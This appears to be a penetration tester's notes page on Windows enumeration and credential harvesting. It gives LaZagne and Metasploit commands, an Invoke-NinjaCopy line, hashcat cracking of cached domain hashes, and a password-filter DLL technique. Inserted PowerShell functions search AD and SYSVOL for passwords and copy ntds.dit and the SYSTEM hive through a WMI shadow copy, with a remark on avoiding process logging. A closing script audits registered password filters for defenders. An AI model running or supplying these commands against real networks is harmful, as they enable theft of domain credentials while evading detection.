---
description: All the ways to grab the goodies
---

Enumeration and Harvesting

Enumeration

{% tabs %} {% tab title="Guides" %} {% endtab %}

{% tab title="Endpoint Tools" %}

  • JAWS - JAWS is PowerShell script designed to help penetration testers (and CTFers) quickly identify potential privilege escalation vectors on Windows systems. It
  • RedTeamScripts - Red Team Scripts is a collection of red teaming related tools, scripts, techniques, and notes developed or discovered over time during engagements. Invoke-HostEnum is the tool within these scripts that can perform windows host enumeration for any valuable data.
  • HostRecon - Invoke-HostRecon runs a number of checks on a system to help provide situational awareness to a penetration tester during the reconnaissance phase of an engagement. It gathers information about the local system, users, and domain information. It does not use any 'net', 'ipconfig', 'whoami', 'netstat', or other system commands to help avoid detection. {% endtab %} {% endtabs %}

{% hint style="info" %} Privilege escalation tools can also provide much of the enumeration that you need. {% endhint %}

{% content-ref url="privilege-escalation.md" %} privilege-escalation.md {% endcontent-ref %}

Harvesting and Credential Dumping

ired.team blog - https://www.ired.team/offensive-security/credential-access-and-credential-dumping

Endpoint Tools

{% tabs %} {% tab title="Endpoint Tools" %} {% endtab %}

{% tab title="LaZagne" %}

LaZagne is an open-source post-exploitation tool that recovers passwords stored on a system by locally installed software. It has modules for Windows, Linux and macOS, but its coverage is broadest on Windows.
Software stores credentials in different ways, such as plaintext files, local databases or a credential manager (DPAPI on Windows). LaZagne knows where each supported application keeps its secrets and how to decode them, so it searches those locations and retrieves any passwords it finds.
LaZagne is capable of extracting passwords from 87 different software applications in the following categories:
Browsers, Chats, Databases, Games, Git, Mails, Maven, Dumps from memory, Multimedia, PHP, SVN, Sysadmin, WIFI, and Internal mechanism password storage
The LaZagne tool, along with the full list of software it supports, is available in its public GitHub repository.

https://www.youtube.com/watch?v=AwFyiFOXrd0

Using LaZagne on Windows

LaZagne's coverage of Windows software is extensive: browsers including Chrome and Firefox, chat clients including Skype, databases, and mail clients including Outlook.
It also supports credential retrieval for many sysadmin utilities such as OpenVPN and OpenSSH, and for password managers such as KeePass (its configuration files, not the vault itself), which can yield credentials for moving to other hosts in the network.

Usage

The Windows release ships as a standalone executable (lazagne.exe); note that the .exe build misses some credentials, such as Google Chrome passwords, that the Python script recovers.
Double-clicking lazagne.exe will usually only produce a warning that the file is malicious (LaZagne is flagged by most antivirus engines), so run it from a command prompt instead:

```cmd
> lazagne.exe
:: Run all modules
> lazagne.exe all
:: Run the browser modules
> lazagne.exe browsers
```

There is also a Python script in the Windows directory of the LaZagne repository that can run on systems with Python installed. Install the dependencies listed in the repository's requirements.txt first.

```cmd
> python laZagne.py
:: Run all modules
> python laZagne.py all
:: Run only the Google Chrome browser module; add -v for verbose output
> python laZagne.py browsers -google -v
```
{% endtab %}

{% tab title="Mimikatz" %} {% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Mimikatz.md" %}

Mimikatz - Utility to extract plaintext passwords, hashes, PIN codes and Kerberos tickets from memory (LSASS), and to perform pass-the-hash and pass-the-ticket or build Golden Tickets. {% endtab %} {% endtabs %}

Endpoint Techniques

{% tabs %} {% tab title="Cred Locations" %}

Places credentials turn up once you have a foothold in the domain:

  • Passwords in AD attributes (description, info, comment and similar free-text fields that admins fill in)
  • Mining SMB shares (config files, backups, scripts)
  • Scripts stored in SYSVOL (logon scripts with hard-coded credentials; SYSVOL is readable by every domain user)
  • Passwords in GPO (Group Policy Preferences cpassword, see the GPP tab)
  • NTDS.DIT password extraction (see the Vol. Shadow Copy, NinjaCopy and DCSync tabs)
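Two of the locations above as code. This is an added example, not from the page or from any of the tools it lists: Find-AdAttributePassword queries user objects through System.DirectoryServices (no RSAT/ActiveDirectory module needed) for the free-text attributes admins tend to stuff passwords into, and Find-SysvolScriptPassword greps scripts under a SYSVOL (or any) path for password-like strings. The attribute list, the regexes and the sample logon script are assumptions to tune per environment, not a complete catalogue.

```powershell
function Find-AdAttributePassword {
    param(
        [string]$SearchBase = ([adsi]'LDAP://RootDSE').defaultNamingContext,
        [string[]]$Attributes = @('description', 'info', 'comment',
                                  'userPassword', 'unixUserPassword', 'msSFU30Password'),
        [regex]$Pattern = '(?i)pass(word|wd)?|pwd|cred|secret'
    )
    $searcher = New-Object System.DirectoryServices.DirectorySearcher
    $searcher.SearchRoot = [adsi]"LDAP://$SearchBase"
    $searcher.PageSize   = 1000
    # Only fetch objects that actually have one of the interesting attributes populated
    $clauses = ($Attributes | ForEach-Object { "($_=*)" }) -join ''
    $searcher.Filter = "(&(objectClass=user)(|$clauses))"
    $null = $searcher.PropertiesToLoad.AddRange([string[]](@('sAMAccountName') + $Attributes))

    foreach ($result in $searcher.FindAll()) {
        foreach ($attr in $Attributes) {
            # ResultPropertyCollection keys are lower-case; some attributes come back as byte[]
            foreach ($value in $result.Properties[$attr.ToLower()]) {
                $text = if ($value -is [byte[]]) { [Text.Encoding]::UTF8.GetString($value) } else { [string]$value }
                if ($text -match $Pattern) {
                    [pscustomobject]@{
                        Account   = [string]$result.Properties['samaccountname'][0]
                        Attribute = $attr
                        Value     = $text
                    }
                }
            }
        }
    }
}

function Find-SysvolScriptPassword {
    param(
        # Real use: "\\$env:USERDNSDOMAIN\SYSVOL"; any local directory works for testing
        [Parameter(Mandatory)][string]$Path,
        [string[]]$Include = @('*.bat', '*.cmd', '*.vbs', '*.ps1', '*.ini', '*.txt'),
        # 1) "password = x" / "pwd: x"   2) "net use ... /user:DOMAIN\name <password>"
        [regex]$Pattern = '(?i)(pass(word|wd)?|pwd)\s*[:=]\s*\S+|net\s+use\s+.*/user:\S+\s+\S+'
    )
    Get-ChildItem -Path $Path -Recurse -Include $Include -File -ErrorAction SilentlyContinue |
        Select-String -Pattern $Pattern |
        ForEach-Object {
            [pscustomobject]@{ File = $_.Path; Line = $_.LineNumber; Match = $_.Line.Trim() }
        }
}

# Constructed sample logon script (not a real capture) so the SYSVOL grep can be
# tried without a domain. Both credentials below are fake.
$sampleDir = Join-Path $env:TEMP 'sysvol-sample\scripts'
New-Item -ItemType Directory -Path $sampleDir -Force | Out-Null
@'
@echo off
net use H: \\fileserver\home /user:CORP\svc_backup Summer2019!
echo SQLPWD=Welcome1 > %TEMP%\legacy.ini
'@ | Set-Content -Path (Join-Path $sampleDir 'logon.bat')

Find-SysvolScriptPassword -Path $sampleDir | Format-Table -AutoSize
# On a domain-joined host:
#   Find-AdAttributePassword | Format-Table -AutoSize
#   Find-SysvolScriptPassword -Path "\\$env:USERDNSDOMAIN\SYSVOL" | Format-Table -AutoSize
```

The LDAP filter only asks for objects that have at least one of the target attributes set, which keeps the search cheap in large domains; both functions are read-only and need nothing beyond an ordinary domain user account.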

{% endtab %}

{% tab title="Dump w/o LSASS" %} {% endtab %}

{% tab title="Skeleton Key" %} {% endtab %}

{% tab title="Vol. Shadow Copy" %}

Once you have Domain Admin access, the old way to pull all hashes from the DC was to run commands on the domain controller itself and use Volume Shadow Copy (or a raw-volume copy tool) to grab the ntds.dit file, which is otherwise held open and locked by the OS.

  • RTFM: Volume Shadow Copy - pg.21
  • Volume Shadow Copy technique (old)
    • ntds.dit is permanently locked (in use) by the directory service, so it cannot be copied directly.
    • A shadow copy of the volume gives a consistent, unlocked snapshot that we can copy the file out of. Take the SYSTEM hive as well: the boot key stored in it is needed to decrypt the hashes in ntds.dit. SAM only holds local accounts.

```cmd
C:\> vssadmin create shadow /for=C:
:: the copy commands write into the current directory
C:\> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[DISK_NUMBER]\windows\ntds\ntds.dit
C:\> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[DISK_NUMBER]\windows\system32\config\SYSTEM
C:\> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[DISK_NUMBER]\windows\system32\config\SAM
:: alternative to copying the SYSTEM hive out of the snapshot
C:\> reg SAVE HKLM\SYSTEM c:\SYS
:: clean up: delete the snapshot you created, the oldest one, or all of them for the volume
C:\> vssadmin delete shadows /for=C: /shadow=[SHADOW_ID]
C:\> vssadmin delete shadows /for=C: /oldest
C:\> vssadmin delete shadows /for=C: /all
```
  • Alternative: listing and reading shadow copy contents directly. This is tricky because shadow copies are not regular (stand-alone) volumes; they are pseudo-volume devices without a drive letter or volume name, of the form \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyNNN. You can still access their contents from the command line if you know the device path. Copying a file out of a shadow copy:

```cmd
:: create a test file, snapshot the volume, then look up the snapshot's device path
dir > c:\somefile.txt
vssadmin create shadow /for=c:
vssadmin list shadows
:: "Shadow Copy Volume" in the listing gives the device, say \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy12
set VSHADOW_DEVICE=\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy12
copy %VSHADOW_DEVICE%\somefile.txt c:\somefile_bak.txt
```

  • To enumerate every file on the shadow copy device, use "for /R" against the device path. Note the single %i: this form is for an interactive prompt, and in a batch file you would write %%i instead:

```cmd
for /R %VSHADOW_DEVICE%\ %i in (*) do @echo %i
```
{% endtab %}
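The vssadmin/copy sequence above as one PowerShell function. This is an added example, not from the page or RTFM: it creates the snapshot through WMI (which hands back the snapshot ID, so there is no parsing of "vssadmin list shadows" and no vssadmin.exe process to show up in process-creation logs), copies the locked files out through the GLOBALROOT device path, and always deletes the snapshot again. The destination directory and file list are assumptions. It needs an elevated session; on a domain controller that means Domain Admin or equivalent.

```powershell
function Copy-FromShadowCopy {
    param(
        [string]$Volume      = 'C:\',
        [string]$Destination = 'C:\Windows\Temp\vss',
        [string[]]$Files     = @('Windows\NTDS\ntds.dit',             # the directory database
                                 'Windows\System32\config\SYSTEM',    # boot key needed to decrypt it
                                 'Windows\System32\config\SAM')       # local accounts only
    )
    # Equivalent of "vssadmin create shadow /for=C:"
    $created = (Get-WmiObject -List Win32_ShadowCopy).Create($Volume, 'ClientAccessible')
    if ($created.ReturnValue -ne 0) { throw "Win32_ShadowCopy.Create failed with code $($created.ReturnValue)" }
    $shadow = Get-WmiObject Win32_ShadowCopy | Where-Object { $_.ID -eq $created.ShadowID }
    # DeviceObject is the \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyNN path
    $device = $shadow.DeviceObject

    New-Item -ItemType Directory -Path $Destination -Force | Out-Null
    $copied = @()
    try {
        foreach ($relative in $Files) {
            $source = "$device\$relative"
            $target = Join-Path $Destination (Split-Path $relative -Leaf)
            # Copy-Item cannot open the GLOBALROOT device path; cmd's copy can
            cmd.exe /c copy /y "$source" "$target" | Out-Null
            if (Test-Path $target) { $copied += $target } else { Write-Warning "not found in snapshot: $source" }
        }
    } finally {
        # Equivalent of "vssadmin delete shadows /shadow=<ID>"; never leave snapshots behind
        Remove-WmiObject -InputObject $shadow
    }
    $copied
}

function Get-ShadowCopyListing {
    # Directory listing inside an existing snapshot: the "for /R" trick without the % quoting
    param([Parameter(Mandatory)][string]$Device, [string]$SubPath = 'Windows\System32\config')
    cmd.exe /c dir /b "$Device\$SubPath"
}

# Grab the three files and print where they landed
Copy-FromShadowCopy
```

The copied ntds.dit and SYSTEM hive are then processed offline, for example with impacket's secretsdump.py (-ntds ntds.dit -system SYSTEM LOCAL). Snapshot creation on a DC is still visible to defenders through the Volume Shadow Copy service and WMI activity, so this is quieter than vssadmin.exe, not silent.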

{% tab title="NinjaCopy" %} NinjaCopy (PowerSploit) http://bit.ly/2HpvKwj

  • Copies a file from an NTFS volume by opening the raw volume device and parsing the NTFS structures itself, instead of going through the file system API (requires administrative rights for raw volume access)
  • This bypasses file DACLs, SACLs (no object-access audit event is generated) and sharing/read-handle locks
  • It can therefore read files that are normally locked, such as ntds.dit and the registry hives (SYSTEM, SAM, SECURITY)
  • > Invoke-NinjaCopy -Path “c:\Windows\ntds\ntds.dit” -LocalDestination "c:\Windows\temp\ntds.di {% endtab %}

{% tab title="DCSync" %} DCSync (Modern)

  • Instead of copying ntds.dit, an account with directory replication rights (Domain Admins by default, or anything granted DS-Replication-Get-Changes and DS-Replication-Get-Changes-All) asks a DC to replicate the password hashes over the normal DRSUAPI replication protocol; nothing is written to the DC's disk. Mimikatz implements this as lsadump::dcsync and impacket's secretsdump.py as -just-dc. {% endtab %} {% endtabs %}

Windows Service Extraction

{% tabs %} {% tab title="Windows Native Tooling" %}

{% endtab %}

{% tab title="GPP Vuln" %} Group Policy Preferences (GPP) cpassword

  • Accounts pushed through GPP (local users and groups, services, scheduled tasks, drive maps, data sources, printers) are stored in SYSVOL as XML files (Groups.xml, Services.xml, ScheduledTasks.xml, Drives.xml, DataSources.xml, Printers.xml) with the password in a cpassword attribute. SYSVOL is readable by every domain user, so these files are too.
  • cpassword is not a hash: it is the password, AES-256-CBC encrypted with a static key that Microsoft published in the MS-GPPREF specification, so it is trivially reversible. MS14-025 stopped new passwords being written this way but did not remove existing files from SYSVOL.
  • Exploit available in the PowerSploit script Get-GPPPassword.ps1
  • Metasploit module
    • > use post/windows/gather/credentials/gpp
    • > set SESSION [Session # of your shell]
    • > exploit
  • http://esec-pentest.sogeti.com/public/files/gpprefdecrypt.py
  • Net-GPPPassword - .NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences. {% endtab %}

{% tab title="Cached Creds" %} Windows Cached Credentials (MSCache / DCC)

  • Windows caches the last 10 sets of domain credentials used on the device by default (CachedLogonsCount under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon) so that users can still log on when no DC is reachable. They are stored in the SECURITY hive (HKLM\SECURITY\Cache), which only SYSTEM can read.
  • Metasploit module - post/windows/gather/cachedump
  • The cached value is an MS-DCC2 (mscash2) hash derived from the NT hash and the lower-cased username with PBKDF2-HMAC-SHA1 at 10240 iterations. It cannot be used for pass-the-hash; it has to be cracked, and it cracks slowly.
  • Crack via hashcat
    • format: $DCC2$10240#account_name#hash
    • hashcat.exe -m 2100 hashes\mscash2.txt lists\crackstat_realhuman_shill.txt (older releases: oclHashcat64.exe)
    • Warning: With a normal GPU this takes on average 20 days to crack {% endtab %}

{% tab title="PW Filter DLL" %}

Password Filter DLL - used by Windows to enforce password strength policies.

  • System administrators can create password filter DLLs to ensure all password changes meet a minimum requirement.
  • New passwords are passed to the DLL in plaintext, allowing attackers to leverage this Windows feature to steal credentials.
  • Password changes on Windows are handled by the Local Security Authority (LSA). When a password change occurs, the LSA calls each registered password filter to check that the new password meets the specified requirements.
  • Each password filter must return 'true' for the password change to occur; if any filter returns 'false', an error is displayed to the user. Password filters can be installed locally or on domain controllers (DCs); on a DC the filter sees every domain password change that DC processes.
  • Password filters are DLL files placed in the C:\Windows\System32 directory.
  • Once in place, the new file must be registered by adding its name (without the .dll extension) to the REG_MULTI_SZ value HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages. LSA loads the packages at startup, so the filter only becomes active after a reboot.
  • The DLL exports three functions, each of which performs a specific task when called:
    • InitializeChangeNotify is called when LSA loads the filter. It returns true or false to indicate whether the filter initialised successfully.
    • PasswordFilter is called to validate the new password. It contains the code that tests the proposed password and returns true or false to indicate whether the password is acceptable.
    • PasswordChangeNotify is called after the password change has been committed, with the account name and the new password.
  • Password filter DLLs can be used by malicious actors to harvest account credentials. The PasswordFilter and PasswordChangeNotify functions both receive the plaintext password and the name of the account whose password is being changed. By installing a malicious password filter, an attacker (who already needs administrative rights on the host to do so) can exfiltrate every new password to a remote server or local file, or block every password change by making PasswordFilter always return false.
  • Restricting write access to HKLM\SYSTEM\CurrentControlSet\Control\Lsa (where the Notification Packages value lives) to SYSTEM and Administrators prevents other users or groups from registering a filter, and the value itself should be monitored for changes; a new entry that is not scecli (or rassfm on a DC) deserves a look. {% endtab %} {% endtabs %}
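The check a defender (or a red teamer confirming persistence) wants for the password filter technique, as an added example that is not from the page: it reads the LSA "Notification Packages" value, checks that each DLL exists in System32 and carries a valid Authenticode signature, flags names outside a baseline, and lists who can write the Lsa key, since anyone who can is able to register a filter. The baseline names are an assumption for a stock Windows install (scecli everywhere, rassfm on domain controllers).

```powershell
function Get-PasswordFilterAudit {
    param([string[]]$Baseline = @('scecli', 'rassfm'))

    $lsaPath  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $packages = (Get-ItemProperty -Path $lsaPath -Name 'Notification Packages').'Notification Packages'

    $filters = foreach ($name in $packages) {
        $dll    = Join-Path $env:SystemRoot "System32\$name.dll"
        $status = 'FileMissing'
        $signer = ''
        if (Test-Path -Path $dll) {
            $sig    = Get-AuthenticodeSignature -FilePath $dll
            $status = $sig.Status            # Valid / NotSigned / HashMismatch / ...
            if ($sig.SignerCertificate) { $signer = $sig.SignerCertificate.Subject }
        }
        [pscustomobject]@{
            Package    = $name
            Path       = $dll
            Signature  = $status
            Signer     = $signer
            InBaseline = ($Baseline -contains $name)
            # anything unsigned, missing, or simply unexpected is worth a second look
            Suspicious = (-not ($Baseline -contains $name)) -or ($status -ne 'Valid')
        }
    }

    # Principals allowed to set values under the Lsa key can register a new filter.
    # ACEs expressed with generic rights (GENERIC_ALL etc.) do not carry the SetValue
    # bit and will not show up here; inspect those by hand.
    $setValue = [System.Security.AccessControl.RegistryRights]::SetValue
    $writers  = (Get-Acl -Path $lsaPath).Access |
        Where-Object { $_.AccessControlType -eq 'Allow' -and ($_.RegistryRights -band $setValue) } |
        ForEach-Object { $_.IdentityReference.Value } | Sort-Object -Unique

    [pscustomobject]@{
        Filters    = $filters
        KeyWriters = $writers
    }
}

$audit = Get-PasswordFilterAudit
$audit.Filters | Format-Table -AutoSize
"Can register filters: $($audit.KeyWriters -join ', ')"
$audit.Filters | Where-Object Suspicious | ForEach-Object { Write-Warning "review $($_.Package): $($_.Signature)" }
```

A signed DLL from an unexpected publisher is still a finding: the point of the baseline is that only the two Microsoft packages belong there on a default build, so treat any extra name as a registered filter to explain, and remember that a freshly added entry does nothing until the next reboot.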

Misc

Command Reference
  • General Enumeration
    • RTFM: Linux System Info - pg. 5
    • BTFM: Linux System Info - pg. 71
    • RTFM: Windows System Info - pg. 15
    • BTFM: Windows System Info - pg. 60
    • RTFM: WMI Info - pg. 20
    • RTFM: Powershell Info - pg. 22
    • RTFM: Registry Locations - pg. 26
  • Host Enumeration
    • Browser Information
      • PTFM: Browser Information- pg. 46
    • Virtual Machine Detection
      • PTFM: Windows VM Detection - pg. 47
      • PTFM: Linux VM Detection - pg. 106
    • Searching for cleartext passwords
      • PTFM: Windows Cleartext Passwords - pg. 40
      • PTFM: Linux Cleartext Passwords - pg. 102
    • Credential Dumping
      • PTFM: Windows Credential Dumping - pg. 41
      • PTFM: Linux Credential Dumping - pg. 102
    • Firewall settings
      • BTFM: Windows Firewall - pg. 22
      • BTFM: Linux Firewall - pg. 35
  • Active Directory
    • BTFM: AD Inventory - pg. 16
  • Email collection
    • PTFM: Email Collection - pg. 59